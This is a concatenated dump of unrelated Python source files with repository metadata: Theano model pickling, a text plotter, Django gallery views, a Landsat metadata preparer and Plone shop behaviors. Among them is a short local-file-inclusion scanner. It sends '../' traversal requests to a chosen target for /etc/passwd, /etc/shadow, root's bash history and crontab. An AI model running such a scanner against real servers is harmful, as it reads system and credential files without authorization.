:param param: layer parameters listing the layers weights
:return: list of weight values
"""
w = []
if isinstance(param, list):
for p in param:
w.append(self.recGetWeightVals(p))
else:
w = param.get_value()
return w
def save(self, filename):
"""
Save the state of this network to a pickle file on disk.
:param filename: Save the parameters of this network to a pickle file at the named path. If this name ends in
".gz" then the output will automatically be gzipped; otherwise the output will be a "raw" pickle.
:return: None
"""
state = dict([('class', self.__class__.__name__), ('network', self.__str__())])
for layer in self.layers:
key = '{}-values'.format(layer.layerNum)
state[key] = [p.get_value() for p in layer.params]
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'wb')
cPickle.dump(state, handle, -1)
handle.close()
        print 'Saved model parameters to {}'.format(filename)
def load(self, filename):
"""
Load the parameters for this network from disk.
:param filename: Load the parameters of this network from a pickle file at the named path. If this name ends in
".gz" then the input will automatically be gunzipped; otherwise the input will be treated as a "raw" pickle.
:return: None
"""
opener = gzip.open if filename.lower().endswith('.gz') else open
handle = opener(filename, 'rb')
saved = cPickle.load(handle)
handle.close()
if saved['network'] != self.__str__():
print "Possibly not matching network configuration!"
differences = list(difflib.Differ().compare(saved['network'].splitlines(), self.__str__().splitlines()))
print "Differences are:"
print "\n".join(differences)
for layer in self.layers:
if len(layer.params) != len(saved['{}-values'.format(layer.layerNum)]):
print "Warning: Layer parameters for layer {} do not match. Trying to fit on shape!".format(layer.layerNum)
n_assigned = 0
for p in layer.params:
for v in saved['{}-values'.format(layer.layerNum)]:
if p.get_value().shape == v.shape:
p.set_value(v)
n_assigned += 1
if n_assigned != len(layer.params):
raise ImportError("Could not load all necessary variables!")
else:
print "Found fitting parameters!"
else:
prms = layer.params
for p, v in zip(prms, saved['{}-values'.format(layer.layerNum)]):
if p.get_value().shape == v.shape:
p.set_value(v)
else:
print "WARNING: Skipping parameter for {}! Shape {} does not fit {}.".format(p.name, p.get_value().shape, v.shape)
print 'Loaded model parameters from {}'.format(filename)
|
gpl-3.0
| -8,016,346,717,327,464,000
| 37.740406
| 150
| 0.569489
| false
| 4.16226
| false
| false
| false
|
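`computeOutput` above pads the final mini-batch up to `batch_size` by repeating the last sample, then trims the padding off the result. That padding step in isolation, as a small numpy sketch:

```python
import numpy


def pad_to_batch(x, batch_size):
    """Pad axis 0 to a multiple of batch_size by repeating the last sample."""
    n_samp = x.shape[0]
    pad_size = int(batch_size * numpy.ceil(n_samp / float(batch_size)))
    out = numpy.empty((pad_size,) + x.shape[1:], dtype=x.dtype)
    out[:n_samp] = x
    out[n_samp:] = x[-1]      # repeat the last sample, as computeOutput does
    return out


x = numpy.arange(10).reshape(5, 2)
print(pad_to_batch(x, 4).shape)   # (8, 2); rows 5..7 are copies of x[-1]
```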
per9000/naiveplot
|
src/nplot.py
|
1
|
5073
|
#!/usr/bin/python
from argparse import ArgumentParser
from sys import stdin
from string import ascii_uppercase
from naiveplot import NaivePlot, Curve, Point, Line
class NaiveParserPlotter:
"""Class for reading and plotting"""
def __init__(self):
"""Setup place holders"""
self.args = None
self.points = None
self.lines = None
self.colors = None
self.plot = None
return
def setup(self):
"""Do all setup after parsing args"""
self.get_handle()
self.setup_formats()
return
def get_handle(self):
"""Get a handle to read from"""
if self.args.std_in:
self.handle = stdin
elif self.args.in_file:
self.handle = open(self.args.in_file, 'r')
else:
pass # TODO: exception?
return
def setup_formats(self):
"""Return format vectors"""
self.points = list(ascii_uppercase)
self.lines = ['.', '-', ':', '~', "'"]
self.colors = ['blue', 'red', 'green', 'yellow', 'magenta', 'cyan',
'grey'] #'white'
return
def get_format(self, idx):
"""get approproate combo"""
attrs = list()
for container in [self.points, self.lines, self.colors]:
attrs.append(container[idx%len(container)])
return tuple(attrs)
def parse_args(self, args=None):
"""Parse the arguments"""
parser = ArgumentParser(description="Plot the numbers given in a file "
"or in stdin")
rgroup = parser.add_argument_group("Read from...")
        rgroup.add_argument('--std-in', action="store_true", default=False,
                            help="Read input from stdin instead of a file.")
rgroup.add_argument('--in-file', '-f', type=str, default=None,
help="Specify input file path.")
dgroup = parser.add_argument_group("Input data...")
dgroup.add_argument('--xy', '-x', action="store_true", default=False,
help="Treat first column as x values, and the "
"following as y-values (default False).")
dgroup.add_argument('--col', '-c', action="append", dest='cols',
type=int, default=list(),
help="Specify which columns to investigate. "
"Repeat if needed. Default: All")
dgroup.add_argument('--ignore-first', '-i', action="store_true",
default=False, help="ignore first line")
dgroup.add_argument('--sep', '-s', default=' ',
help="Specify separator, default: space")
fgroup = parser.add_argument_group("Formatting...")
fgroup.add_argument('--gap', '-g', type=float, default=0.01,
help="inverted number of subpoints in lines")
fgroup.add_argument('--not-implemented')
if args:
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
return
def process(self):
"""Do the real work"""
ctr = 0
olds = None
pcontainer = list()
self.plot = NaivePlot(xmin=-0.1, ymin=-0.1)
for line in self.handle:
ctr += 1
if ctr == 1 and self.args.ignore_first:
continue
values = [float(val.strip()) for val in \
line.strip().split(self.args.sep) if val]
x = float(ctr)
if self.args.xy:
x = float(values[0])
points = [Point(x, val) for val in values if x and val]
pcontainer.append(points)
if olds:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
if not olds[i] or not points[i]:
continue
l = Line(olds[i], points[i])
(_, lchar, lcol) = self.get_format(i)
self.plot.add_curve(Curve(l, 0.0, 1.0, self.args.gap),
lchar, lcol)
olds = points
(xmin, xmax, ymin, ymax) = (0, 0, 0, 0)
for points in pcontainer:
for i in xrange(len(points)):
if not self.args.cols or i not in self.args.cols:
continue
(pchar, _, pcol) = self.get_format(i)
self.plot.add_curve(points[i], pchar, pcol)
xmin = min(xmin, points[i].x)
xmax = max(xmax, points[i].x)
ymin = min(ymin, points[i].y)
ymax = max(ymax, points[i].y)
self.plot.zoom(xmin, xmax, ymin, ymax)
return
def __str__(self):
"""just print"""
return str(self.plot)
if __name__ == "__main__":
npp = NaiveParserPlotter()
npp.parse_args()
npp.setup()
npp.process()
print npp
|
gpl-3.0
| -1,404,144,900,113,913,000
| 32.156863
| 79
| 0.500099
| false
| 4.131107
| false
| false
| false
|
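`get_format` above cycles three style containers of different lengths with `container[idx % len(container)]`, so successive column indexes get distinct point/line/color combos for a long stretch before repeating. The cycling in isolation:

```python
points = ['A', 'B', 'C']
lines = ['.', '-', ':', '~', "'"]
colors = ['blue', 'red', 'green']


def get_format(idx):
    """Pick one entry per container, wrapping each one independently."""
    return tuple(c[idx % len(c)] for c in (points, lines, colors))


for i in range(6):
    print(i, get_format(i))
# the combos repeat only after lcm(3, 5, 3) = 15 indexes
```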
cpodlesny/lisbon
|
src/gallery/views.py
|
1
|
7355
|
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect, get_object_or_404
from django.utils.translation import ugettext_lazy as _
from helpers.models import Helpers
from offer.models import OfferCategory
from tours.models import Category
from .forms import GalleryForm
from .models import Gallery
def get_lang(request):
lang = request.LANGUAGE_CODE
return lang
def get_company():
return Helpers.objects.get(id=1).company_name
def gallery_list(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
queryset_list = Gallery.objects.all()
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '#', 'name': _('Gallery'), 'active': True}
]
paginator = Paginator(queryset_list, 6)
page_request_var = 'page'
page = request.GET.get(page_request_var)
try:
queryset = paginator.page(page)
except PageNotAnInteger:
queryset = paginator.page(1)
except EmptyPage:
queryset = paginator.page(paginator.num_pages)
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery'),
'breadcrumbs': breadcrumbs,
'object_list': queryset,
'page_request_var': page_request_var,
}
return render(request, 'partials/gallery.html', context)
def gallery_detail(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
gallery = Gallery.objects.get(pk=pk)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
gallery_description = {
'pt': gallery.description_PT,
'en': gallery.description_EN,
'de': gallery.description_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
gallery_current = {
'title': gallery_title[lang],
'description': gallery_description[lang],
'id': gallery.id,
'video': gallery.video,
'img': gallery.img,
'img1': gallery.img_1,
'img2': gallery.img_2,
'img3': gallery.img_3,
}
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'breadcrumbs': breadcrumbs,
'title': gallery_title[lang],
'object': gallery_current,
}
return render(request, 'templates/_gallery_details.html', context)
def gallery_update(request, pk=None):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
lang = get_lang(request)
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
gallery = get_object_or_404(Gallery, pk=pk)
gallery_title = {
'pt': gallery.title_PT,
'en': gallery.title_EN,
'de': gallery.title_DE
}
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': gallery_title[lang], 'active': True}
]
form = GalleryForm(request.POST or None, request.FILES or None, instance=gallery)
if form.is_valid():
gallery = form.save(commit=False)
gallery.save()
messages.success(request, _('Gallery edited'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Gallery edit'),
'breadcrumbs': breadcrumbs,
'instance': gallery,
'form': form,
'value': _('Add'),
}
return render(request, 'templates/_form.html', context)
def gallery_create(request):
query = request.GET.get('q')
if query:
return redirect(reverse('search') + '?q=' + query)
lang = get_lang(request)
footer = {
'pt': Helpers.objects.get(id=1).about_footer_PT,
'en': Helpers.objects.get(id=1).about_footer_EN,
'de': Helpers.objects.get(id=1).about_footer_DE
}
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
else:
form = GalleryForm(request.POST or None, request.FILES or None)
breadcrumbs = [
{'url': '/', 'name': _('Home')},
{'url': '/gallery', 'name': _('Gallery')},
{'url': '#', 'name': _('Create Gallery'), 'active': True}
]
if form.is_valid():
instance = form.save(commit=False)
instance.user = request.user
instance.save()
messages.success(request, _('Gallery created'))
return redirect('gallery:list')
context = {
'footer': {
'about': footer[lang],
'icon': Helpers.objects.get(id=1).footer_icon
},
'nav': {
'tour_categories_list': Category.objects.all(),
'offer_categories_list': OfferCategory.objects.all(),
},
'company': get_company(),
'title': _('Create Gallery'),
'breadcrumbs': breadcrumbs,
'value': _('Add'),
'form': form
}
return render(request, 'templates/_form.html', context)
def gallery_delete(request, pk=None):
if not request.user.is_staff or not request.user.is_superuser:
return redirect('accounts:signup')
instance = get_object_or_404(Gallery, pk=pk)
instance.delete()
messages.success(request, _('Gallery deleted'))
return redirect('gallery:list')
|
mit
| 9,215,973,351,278,447,000
| 31.982063
| 89
| 0.55758
| false
| 3.673826
| false
| false
| false
|
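Every list view above uses the same three-way `Paginator` fallback: a non-integer page value goes to page 1, an out-of-range page goes to the last page. The pattern extracted as a sketch (Django's `Paginator` works on plain sequences, so this runs with Django installed but no project; the page size of 6 mirrors `gallery_list`):

```python
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage


def safe_page(items, page, per_page=6):
    """Resolve a raw ?page= value the way gallery_list() above does."""
    paginator = Paginator(items, per_page)
    try:
        return paginator.page(page)
    except PageNotAnInteger:
        return paginator.page(1)                    # "page=abc" -> first page
    except EmptyPage:
        return paginator.page(paginator.num_pages)  # "page=999" -> last page


print(list(safe_page(range(20), 'abc')))   # [0, 1, 2, 3, 4, 5]
print(list(safe_page(range(20), 999)))     # [18, 19]
```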
ceos-seo/Data_Cube_v2
|
agdc-v2/utils/usgslsprepare.py
|
1
|
8328
|
# coding=utf-8
"""
Ingest data from the command-line.
"""
from __future__ import absolute_import, division
import logging
import uuid
from xml.etree import ElementTree
import re
from pathlib import Path
import yaml
from dateutil import parser
from datetime import timedelta
import rasterio.warp
import click
from osgeo import osr
import os
# image boundary imports
import rasterio
from rasterio.errors import RasterioIOError
import rasterio.features
import shapely.affinity
import shapely.geometry
import shapely.ops
_STATIONS = {'023': 'TKSC', '022': 'SGS', '010': 'GNC', '011': 'HOA',
'012': 'HEOC', '013': 'IKR', '014': 'KIS', '015': 'LGS',
'016': 'MGR', '017': 'MOR', '032': 'LGN', '019': 'MTI', '030': 'KHC',
'031': 'MLK', '018': 'MPS', '003': 'BJC', '002': 'ASN', '001': 'AGS',
'007': 'DKI', '006': 'CUB', '005': 'CHM', '004': 'BKT', '009': 'GLC',
'008': 'EDC', '029': 'JSA', '028': 'COA', '021': 'PFS', '020': 'PAC'}
###IMAGE BOUNDARY CODE
def safe_valid_region(images, mask_value=None):
try:
return valid_region(images, mask_value)
except (OSError, RasterioIOError):
return None
def valid_region(images, mask_value=None):
mask = None
for fname in images:
## ensure formats match
with rasterio.open(str(fname), 'r') as ds:
transform = ds.affine
img = ds.read(1)
if mask_value is not None:
new_mask = img & mask_value == mask_value
else:
new_mask = img != ds.nodata
if mask is None:
mask = new_mask
else:
mask |= new_mask
shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
shape = shapely.ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
# convex hull
geom = shape.convex_hull
# buffer by 1 pixel
geom = geom.buffer(1, join_style=3, cap_style=3)
# simplify with 1 pixel radius
geom = geom.simplify(1)
# intersect with image bounding box
geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
# transform from pixel space into CRS space
geom = shapely.affinity.affine_transform(geom, (transform.a, transform.b, transform.d,
transform.e, transform.xoff, transform.yoff))
output = shapely.geometry.mapping(geom)
output['coordinates'] = _to_lists(output['coordinates'])
return output
def _to_lists(x):
"""
Returns lists of lists when given tuples of tuples
"""
if isinstance(x, tuple):
return [_to_lists(el) for el in x]
return x
###END IMAGE BOUNDARY CODE
def band_name(path):
name = path.stem
position = name.find('_')
if position == -1:
raise ValueError('Unexpected tif image in eods: %r' % path)
if re.match(r"[Bb]\d+", name[position+1:]):
layername = name[position+2:]
else:
layername = name[position+1:]
return layername
def get_projection(path):
with rasterio.open(str(path)) as img:
left, bottom, right, top = img.bounds
return {
'spatial_reference': str(str(getattr(img, 'crs_wkt', None) or img.crs.wkt)),
'geo_ref_points': {
'ul': {'x': left, 'y': top},
'ur': {'x': right, 'y': top},
'll': {'x': left, 'y': bottom},
'lr': {'x': right, 'y': bottom},
}
}
def get_coords(geo_ref_points, spatial_ref):
spatial_ref = osr.SpatialReference(spatial_ref)
t = osr.CoordinateTransformation(spatial_ref, spatial_ref.CloneGeogCS())
def transform(p):
lon, lat, z = t.TransformPoint(p['x'], p['y'])
return {'lon': lon, 'lat': lat}
return {key: transform(p) for key, p in geo_ref_points.items()}
def populate_coord(doc):
proj = doc['grid_spatial']['projection']
doc['extent']['coord'] = get_coords(proj['geo_ref_points'], proj['spatial_reference'])
def crazy_parse(timestr):
try:
return parser.parse(timestr)
except ValueError:
if not timestr[-2:] == "60":
raise
return parser.parse(timestr[:-2]+'00') + timedelta(minutes=1)
def prep_dataset(fields, path):
images_list = []
for file in os.listdir(str(path)):
if file.endswith(".xml") and (not file.endswith('aux.xml')):
metafile = file
if file.endswith(".tif") and ("band" in file) :
images_list.append(os.path.join(str(path),file))
with open(os.path.join(str(path), metafile)) as f:
xmlstring = f.read()
xmlstring = re.sub(r'\sxmlns="[^"]+"', '', xmlstring, count=1)
doc = ElementTree.fromstring(xmlstring)
satellite = doc.find('.//satellite').text
instrument = doc.find('.//instrument').text
acquisition_date = doc.find('.//acquisition_date').text.replace("-", "")
scene_center_time = doc.find('.//scene_center_time').text[:8]
center_dt = crazy_parse(acquisition_date + "T" + scene_center_time)
aos = crazy_parse(acquisition_date + "T" + scene_center_time) - timedelta(seconds=(24 / 2))
los = aos + timedelta(seconds=24)
lpgs_metadata_file = doc.find('.//lpgs_metadata_file').text
groundstation = lpgs_metadata_file[16:19]
fields.update({'instrument': instrument, 'satellite': satellite})
start_time = aos
end_time = los
images = {band_name(im_path): {
'path': str(im_path.relative_to(path))
} for im_path in path.glob('*.tif')}
projdict = get_projection(path/next(iter(images.values()))['path'])
projdict['valid_data'] = safe_valid_region(images_list)
doc = {
'id': str(uuid.uuid4()),
'processing_level': fields["level"],
'product_type': fields["type"],
'creation_dt': fields["creation_dt"],
'platform': {'code': fields["satellite"]},
'instrument': {'name': fields["instrument"]},
'acquisition': {
'groundstation': {
'name': groundstation,
'aos': str(aos),
'los': str(los)
}
},
'extent': {
'from_dt': str(start_time),
'to_dt': str(end_time),
'center_dt': str(center_dt)
},
'format': {'name': 'GeoTiff'},
'grid_spatial': {
'projection': projdict
},
'image': {
'satellite_ref_point_start': {'path': int(fields["path"]), 'row': int(fields["row"])},
'satellite_ref_point_end': {'path': int(fields["path"]), 'row': int(fields["row"])},
'bands': images
},
'lineage': {'source_datasets': {}}
}
populate_coord(doc)
return doc
def dataset_folder(fields):
fmt_str = "{vehicle}_{instrument}_{type}_{level}_GA{type}{product}-{groundstation}_{path}_{row}_{date}"
return fmt_str.format(**fields)
def prepare_datasets(nbar_path):
fields = re.match(
(
r"(?P<code>LC8|LE7|LT5)"
r"(?P<path>[0-9]{3})"
r"(?P<row>[0-9]{3})"
r"(?P<productyear>[0-9]{4})"
r"(?P<julianday>[0-9]{3})"
), nbar_path.stem).groupdict()
timedelta(days=int(fields["julianday"]))
fields.update({'level': 'sr_refl',
'type': 'LEDAPS',
'creation_dt': ((crazy_parse(fields["productyear"]+'0101T00:00:00'))+timedelta(days=int(fields["julianday"])))})
nbar = prep_dataset(fields, nbar_path)
return (nbar, nbar_path)
@click.command(help="Prepare USGS LS dataset for ingestion into the Data Cube.")
@click.argument('datasets',
type=click.Path(exists=True, readable=True, writable=True),
nargs=-1)
def main(datasets):
logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
for dataset in datasets:
path = Path(dataset)
logging.info("Processing %s", path)
documents = prepare_datasets(path)
dataset, folder = documents
yaml_path = str(folder.joinpath('agdc-metadata.yaml'))
logging.info("Writing %s", yaml_path)
with open(yaml_path, 'w') as stream:
yaml.dump(dataset, stream)
if __name__ == "__main__":
main()
|
apache-2.0
| 6,611,207,923,284,716,000
| 30.908046
| 131
| 0.570725
| false
| 3.42716
| false
| false
| false
|
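`prepare_datasets` above recovers sensor code, path/row, year, and acquisition day-of-year straight from the pre-collection Landsat scene ID in the filename stem. The regex on its own, applied to a hypothetical scene stem:

```python
import re

SCENE_RE = re.compile(
    r"(?P<code>LC8|LE7|LT5)"
    r"(?P<path>[0-9]{3})"
    r"(?P<row>[0-9]{3})"
    r"(?P<productyear>[0-9]{4})"
    r"(?P<julianday>[0-9]{3})"
)

# hypothetical stem: Landsat 8, path 009, row 045, day 134 of 2014
print(SCENE_RE.match("LC80090452014134").groupdict())
# {'code': 'LC8', 'path': '009', 'row': '045', 'productyear': '2014', 'julianday': '134'}
```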
3t1n/scripts
|
Python/LFI-Scan/lfiscan.py
|
1
|
1102
|
#!/usr/bin/env python
#coding: utf-8
#coded by et1m
__author__ = "et1m"
print' _ ______ _____ _____ _____ _ _ '
print'| | | ____|_ _| / ____|/ ____| /\ | \ | |'
print'| | | |__ | | | (___ | | / \ | \| |'
print'| | | __| | | \___ \| | / /\ \ | . ` |'
print'| |____| | _| |_ ____) | |____ / ____ \| |\ |'
print'|______|_| |_____| |_____/ \_____/_/ \_\_| \_|'
print ''
print ''
import requests
import webbrowser
print 'Use on servers running Linux'
alvo = raw_input("enter your target: ")
print''
cd = raw_input("enter the ../ sequence: ")
print ''
print("You entered: " + alvo + cd)
print ''
paginas = ['/etc/passwd','/etc/issue','/proc/version','/etc/profile','/etc/shadow','/root/.bash_history','/var/log/dmessage','/var/mail/root','/var/spool/cron/crontabs/root']
for x in paginas:
    check = requests.get(alvo + cd + x)
    if check.status_code == 200: # if the GET succeeds, open the browser with the full URL
        webbrowser.open(alvo + cd + x)
|
cc0-1.0
| 2,690,219,767,311,702,000
| 31.352941
| 174
| 0.427273
| false
| 2.682927
| false
| false
| false
|
andreesg/bda.plone.shop
|
src/bda/plone/shop/dx.py
|
1
|
14904
|
# -*- coding: utf-8 -*-
from bda.plone.cart import CartItemDataProviderBase
from bda.plone.cart import CartItemPreviewAdapterBase
from bda.plone.cart.interfaces import ICartItemStock
from bda.plone.orders.interfaces import IBuyable
from bda.plone.orders.interfaces import ITrading
from bda.plone.shipping.interfaces import IShippingItem
from bda.plone.shop import message_factory as _
from bda.plone.shop.interfaces import IBuyablePeriod
from bda.plone.shop.mailnotify import BubbleGlobalNotificationText
from bda.plone.shop.mailnotify import BubbleItemNotificationText
from bda.plone.shop.utils import get_shop_article_settings
from bda.plone.shop.utils import get_shop_settings
from bda.plone.shop.utils import get_shop_shipping_settings
from bda.plone.shop.utils import get_shop_tax_settings
from plone.autoform.interfaces import IFormFieldProvider
from plone.dexterity.interfaces import IDexterityContent
from plone.supermodel import model
from zope import schema
from zope.component import adapter
from zope.component import getUtility
from zope.interface import implementer
from zope.interface import provider
from zope.schema.interfaces import IContextAwareDefaultFactory
from zope.schema.interfaces import IVocabularyFactory
@provider(IContextAwareDefaultFactory)
def default_item_net(context):
return get_shop_article_settings().default_item_net
@provider(IContextAwareDefaultFactory)
def default_item_vat(context):
return get_shop_tax_settings().default_item_vat
@provider(IContextAwareDefaultFactory)
def default_item_display_gross(context):
return get_shop_settings().default_item_display_gross
@provider(IContextAwareDefaultFactory)
def item_comment_enabled(context):
return get_shop_article_settings().default_item_comment_enabled
@provider(IContextAwareDefaultFactory)
def default_item_comment_required(context):
return get_shop_article_settings().default_item_comment_required
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit_float(context):
return get_shop_article_settings().default_item_quantity_unit_float
@provider(IContextAwareDefaultFactory)
def default_item_cart_count_limit(context):
return get_shop_article_settings().default_item_cart_count_limit
@provider(IContextAwareDefaultFactory)
def default_item_quantity_unit(context):
return get_shop_article_settings().default_item_quantity_unit
@provider(IFormFieldProvider)
class IBuyableBehavior(model.Schema, IBuyable):
"""Buyable behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_net',
'item_vat',
'item_cart_count_limit',
'item_display_gross',
'item_comment_enabled',
'item_comment_required',
'item_quantity_unit_float',
'item_quantity_unit'
]
)
item_net = schema.Float(
title=_(u'label_item_net', default=u'Item net price'),
required=False,
defaultFactory=default_item_net
)
item_vat = schema.Choice(
title=_(u'label_item_vat', default=u'Item VAT (in %)'),
vocabulary='bda.plone.shop.vocabularies.VatVocabulary',
required=False,
defaultFactory=default_item_vat
)
item_cart_count_limit = schema.Float(
title=_(u'label_item_cart_count_limit',
default=u'Max count of this item in cart'),
required=False,
defaultFactory=default_item_cart_count_limit
)
item_display_gross = schema.Bool(
title=_(u'label_item_display_gross', default=u'Display Gross Price'),
description=_(u'help_item_display_gross',
default=u'Show price with taxes included'),
required=False,
defaultFactory=default_item_display_gross
)
item_comment_enabled = schema.Bool(
title=_(u'label_item_comment_enabled', default='Comment enabled'),
required=False,
defaultFactory=item_comment_enabled
)
item_comment_required = schema.Bool(
title=_(u'label_item_comment_required', default='Comment required'),
required=False,
defaultFactory=default_item_comment_required
)
item_quantity_unit_float = schema.Bool(
title=_(
u'label_item_quantity_unit_float', default='Quantity as float'),
required=False,
defaultFactory=default_item_quantity_unit_float
)
item_quantity_unit = schema.Choice(
title=_(u'label_item_quantity_unit', default='Quantity unit'),
vocabulary='bda.plone.shop.vocabularies.QuantityUnitVocabulary',
required=False,
defaultFactory=default_item_quantity_unit
)
@adapter(IBuyableBehavior)
class DXCartItemDataProvider(CartItemDataProviderBase):
"""Accessor Interface
"""
@property
def net(self):
val = self.context.item_net
if not val:
return 0.0
return float(val)
@property
def vat(self):
val = self.context.item_vat
if not val:
return 0.0
return float(val)
@property
def cart_count_limit(self):
return self.context.item_cart_count_limit
@property
def display_gross(self):
return self.context.item_display_gross
@property
def comment_enabled(self):
return self.context.item_comment_enabled
@property
def comment_required(self):
return self.context.item_comment_required
@property
def quantity_unit_float(self):
return self.context.item_quantity_unit_float
@property
def quantity_unit(self):
unit = self.context.item_quantity_unit
vocab = getUtility(
IVocabularyFactory,
'bda.plone.shop.vocabularies.QuantityUnitVocabulary')(self.context)
for term in vocab:
if unit == term.value:
return term.title
@provider(IContextAwareDefaultFactory)
def default_item_display_stock(context):
return True
@provider(IContextAwareDefaultFactory)
def default_item_stock_warning_threshold(context):
return get_shop_article_settings().default_item_stock_warning_threshold
@provider(IFormFieldProvider)
class IStockBehavior(model.Schema):
"""Stock behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'item_display_stock',
'item_available',
'item_overbook',
'item_stock_warning_threshold'
]
)
item_display_stock = schema.Bool(
title=_(u'label_item_display_stock', default=u'Display item stock'),
required=False,
defaultFactory=default_item_display_stock
)
item_available = schema.Float(
title=_(u'label_item_available', default=u'Item stock available'),
required=False
)
item_overbook = schema.Float(
title=_(u'label_item_overbook', default=u'Item stock overbook'),
required=False
)
item_stock_warning_threshold = schema.Float(
title=_(u'label_item_stock_warning_threshold',
default=u'Item stock warning threshold.'),
required=False,
defaultFactory=default_item_stock_warning_threshold
)
@implementer(ICartItemStock)
@adapter(IStockBehavior)
class DXCartItemStock(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def display(self):
return self.context.item_display_stock
@property
def available(self):
return self.context.item_available
@available.setter
def available(self, value):
self.context.item_available = value
@property
def overbook(self):
return self.context.item_overbook
@overbook.setter
def overbook(self, value):
self.context.item_overbook = value
@property
def stock_warning_threshold(self):
return self.context.item_stock_warning_threshold
@stock_warning_threshold.setter
def stock_warning_threshold(self, value):
self.context.item_stock_warning_threshold = value
@provider(IContextAwareDefaultFactory)
def default_shipping_item_shippable(context):
return get_shop_shipping_settings().default_shipping_item_shippable
@provider(IFormFieldProvider)
class IShippingBehavior(model.Schema):
"""Shipping behavior.
"""
model.fieldset(
'shop',
label=u"Shop",
fields=[
'shipping_item_shippable',
'shipping_item_weight',
'shipping_item_free_shipping'
]
)
shipping_item_shippable = schema.Bool(
title=_(u'label_shipping_item_shippable', default=u'Item Shippable'),
description=_('help_shipping_item_shippable',
                      default=u'Flag whether the item is shippable '
                              u'(e.g. downloads are not)'),
defaultFactory=default_shipping_item_shippable
)
shipping_item_weight = schema.Float(
title=_(u'label_shipping_item_weight', default=u'Item Weight'),
required=False
)
shipping_item_free_shipping = schema.Bool(
title=_(u'label_shipping_item_free_shipping',
default=u'Free Shipping'),
description=_('help_shipping_item_free_shipping',
default=u'Flag whether shipping of this item is free.')
)
@implementer(IShippingItem)
@adapter(IShippingBehavior)
class DXShippingItem(object):
"""Accessor Interface
"""
def __init__(self, context):
self.context = context
@property
def shippable(self):
return self.context.shipping_item_shippable
@property
def weight(self):
return self.context.shipping_item_weight
@property
def free_shipping(self):
return self.context.shipping_item_free_shipping
@adapter(IDexterityContent)
class DXCartItemPreviewImage(CartItemPreviewAdapterBase):
"""Accessor Interface
"""
preview_scale = "tile"
@property
def url(self):
"""Get url of preview image by trying to read the 'image' field on the
context.
"""
img_scale = None
if hasattr(self.context, 'image'):
scales = self.context.restrictedTraverse('@@images')
img_scale = scales.scale("image", scale=self.preview_scale)
return img_scale and img_scale.url or ""
@provider(IFormFieldProvider)
class IItemNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'order_text',
'overbook_text'])
order_text = schema.Text(
title=_(
u"label_item_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail"
),
required=False
)
overbook_text = schema.Text(
title=_(
u"label_item_overbook_notification_text",
default=u"Notification text for this item in the order confirmation "
u"mail if item is out of stock"
),
required=False
)
@provider(IFormFieldProvider)
class IGlobalNotificationTextBehavior(model.Schema):
model.fieldset(
'shop',
label=u"Shop",
fields=[
'global_order_text',
'global_overbook_text'])
global_order_text = schema.Text(
title=_(
u"label_item_global_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item"
),
required=False
)
global_overbook_text = schema.Text(
title=_(
u"label_item_global_overbook_notification_text",
default=u"Additional overall notification text for the order "
u"confirmation mail of this item ordered if out of stock"
),
required=False
)
@adapter(IItemNotificationTextBehavior)
class DXItemNotificationText(BubbleItemNotificationText):
"""Accessor Interface
"""
@property
def order_text(self):
if self.context.order_text:
return self.context.order_text
return super(DXItemNotificationText, self).order_text
@property
def overbook_text(self):
if self.context.overbook_text:
return self.context.overbook_text
return super(DXItemNotificationText, self).overbook_text
@adapter(IGlobalNotificationTextBehavior)
class DXGlobalNotificationText(BubbleGlobalNotificationText):
"""Accessor Interface
"""
@property
def global_order_text(self):
if self.context.global_order_text:
return self.context.global_order_text
